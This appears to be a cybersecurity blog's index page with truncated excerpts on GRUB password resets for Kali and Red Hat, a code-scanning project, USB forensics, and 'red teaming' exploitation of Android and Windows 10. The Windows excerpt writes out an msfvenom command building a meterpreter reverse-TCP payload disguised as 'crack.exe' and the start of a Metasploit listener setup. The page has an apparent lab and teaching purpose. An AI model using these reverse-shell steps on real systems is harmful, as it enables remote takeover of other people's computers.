Posts

"How to Reset Your Kali Linux Password Using GRUB"

Image
How to Reset Root Password in Kali Linux Forgetting your Kali Linux password can be frustrating, but don't worry! You can reset it easily using the GRUB bootloader. In this guide, I'll walk you through the step-by-step process to reset your password and regain access to your Kali Linux system. Step 1: Access the GRUB Boot Menu Restart your Kali Linux machine. As the system boots, press Esc or Shift repeatedly until the GRUB menu appears. Step 2: Edit the GRUB Boot Entry In the GRUB menu, use the arrow keys to highlight "Advanced options for Kali GNU/Linux" (or just the default boot option if you don't see this). Press e to edit the boot parameters. Step 3: Modify the Boot Parameters Locate the line that starts with linux /boot/vmlinuz-...

"How to Reset Red Hat Linux Password Using GRUB – Step-by-Step Guide"

Image
Introduction Forgetting your password can be a frustrating experience, especially when working with a Red Hat Linux system where access to critical files and configurations is vital. Fortunately, Red Hat Linux offers a straightforward method to reset user passwords, including the root account, using the GRUB bootloader. Whether you're locked out of your system or need to regain administrative access, this guide will provide you with a step-by-step process for resetting your Red Hat Linux password through the GRUB menu. No additional software is required—just a few simple commands, and you’ll have your system back in action in no time. Let’s get started and restore access to your system efficiently! 🚀 Step-by-Step Guide to Resetting Your Red Hat Linux Password Using GRUB Now that you’ve ensured you have the necessary access and a virtual machine environment, let’s move on to the actual process of resetting your password. Follow these steps carefully: 1. Reboot the Syste...

SecureCode Scanner: A Static Code Analysis Tool for Detecting Vulnerabilities (project - 1)

Image
  Introduction In today’s rapidly evolving tech landscape, ensuring secure software development is paramount. Vulnerabilities like SQL injections, hardcoded credentials, and insecure deserialization can have devastating consequences if exploited. As part of my MSc in IT (Cybersecurity and Digital Forensics), I created SecureCode Scanner , a static code analysis tool that automates the detection of security vulnerabilities in Python, PHP, JavaScript, and Java codebases. This blog details how the tool works, how to set it up, and why it matters for secure coding practices. Key Features 1. Supports Multiple Languages SecureCode Scanner identifies vulnerabilities across Python, PHP, JavaScript, and Java, making it versatile for developers working in diverse environments. 2. Detects Critical Vulnerabilities The tool scans for a wide range of issues, including: Hardcoded passwords and API keys. SQL injection and command injection points. Weak c...

Collecting Deleted Data from Pen drive (Digital Forensics)

Image
Hello everyone, This blog is about how we can Collect data that has been deleted from pen drive.   I using my 64GB pen drive for this practical. For this we need to use two tools that use in Digital Forensics:   1. FTK Imager    :-       FTK Imager is a tool for creating disk images and is absolutely free to use. It was developed by The Access Data Group. It is a tool that helps to preview data and for imaging.   2.   Autopsy :-      Autopsy allows you to examine a hard drive or mobile device and recover evidence from it. Practical start from here:- 1.Open FTK Imager and click on Create Disk Image   2.Select The Source Evidence Type ( Physical Drive ) 3. Select Your Drive 4. Click on finish And Then Add. 5.Then select the Destination Image Type 6.Then type Case Number, Evidence Number, Unique Discription, Examiner and Notes.       Other settings are als...

Exploiting Android using Kali Linux(Red Teaming)

Image
 Hello everyone, this blog is related to exploiting Android system using Kali Linux. So, basically we need two operating systems, First one is kali(attacker) and second one is Android(victim). Note :- You can use virtual device created by Genymotion and it must be below version 7. This Practical works when both of the machines are in same network. So. I have installed Kali-linux in Virtualbox and I am using Genymotion for Android. And I have managed to put the both machines on same network, you have to do same if you are also trying to do same as me. Otherwise Important is both the machines has to be on same network, This also works if you have host machine kali and on other side you have Android Device with you. You can also install kali on Virtualbox and set it to NAT network. For surety u can ping the Android Device machine from Kali to check that the machines are on same network or not. Practical Starts Here -  1. go to kali terminal and type the following command.   ...

Windows 10 Exploitation (Red Teaming)

Image
Exploiting Windows 10 (latest update) using  metasploit (in KALI): Cyberator Introduction: The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine.  This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on Virtual-box. Step 1: - Open terminal in Kali and type the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<your IP> -f exe > /root/Desktop/crack.exe Step 2: - Open terminal in Kali and type the following commands    msfdb init    msfconsole    use exploit/multi/handler    set payload windows/x64/meterpreter/reverse_tcp    set l...